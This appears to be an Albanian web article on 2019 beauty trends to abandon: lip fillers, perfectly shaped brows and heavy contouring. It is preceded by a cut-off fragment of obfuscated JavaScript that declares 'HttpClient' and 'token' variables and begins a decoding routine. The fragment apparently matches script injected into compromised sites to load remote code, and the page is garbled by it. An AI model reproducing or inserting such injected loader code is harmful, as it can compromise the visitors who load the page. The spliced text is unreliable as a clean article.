;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Vajza mos harxhoni në këto gjëra! R.I.P për këto trende bukurie në 2019-tën

By

Nga viti në vit, trendet e bukurisë po ndryshojnë. E mbani në mend modën e fillim viteve 2000? A doni që menjëherë t’ua vini flakën fotografive tuaja të asaj kohe?

Po po, e dimë… edhe ne ashtu do bënim! Shyqyr që interneti s’ishte kaq i popullarizuar,s e vaj halli…

Ja që trendet e modës e të bukurisë, nuk qëndrojnë me ne për më shumë se një sezon dhe edhe ato të vitit 2018-të, është koha të IKIN!

Ja çfarë s’do jetë në modë në 2019-tën:

Buzët me “fillera” apo mbushje

lip fillers

Ky ternd ka dominuar në vitet e kaluara ndërsa fillerat e buzëve kanë qenë numër një sa i përket kirurgjisë kozmetike në botë, e kjo lloj ndërhyrje ka pësuar rritje nga viti në vit. Mirëpo ka ardhur tani koha për një dukje më natyrale dhe më të butë.

Vetullat e Instagramit

Image result for pretty instagram brows

Këtë vit harrojini ato vetullat e përkryera, që s’do lëviznin një qime edhe sikur të kishit kaluar nëpër një tërmet! Këtë vit nuk është nevoja të kaloni orë të tëra duke i rregulluar dhe këtë na e vërtetoi Rihanna në fotografinë e saj për kopertinën e Vouge. Madje edhe na e futi pak frikën me ato vetulla, se menduam se do rikthehen vetullat e holla të viteve të 90ta!

Konturimi i fytyrës!

Mos e merrni gabim! Kontura është DASHURI. Literalisht, konturimi i fytyrës është celësi i një pamjeje më ‘slim’, të formësuar dhe të definuar. Sidoqoftë, viti 2019të, është viti i “natyrales”. Kjo po që do ndodh këtë vit… kjo s’do të thotë se duhet ta hidhni në plehëra bronzerin tuaj, por përdoreni më pak se s’ia keni nevojën edhe aq.

Artikuj të ngjashëm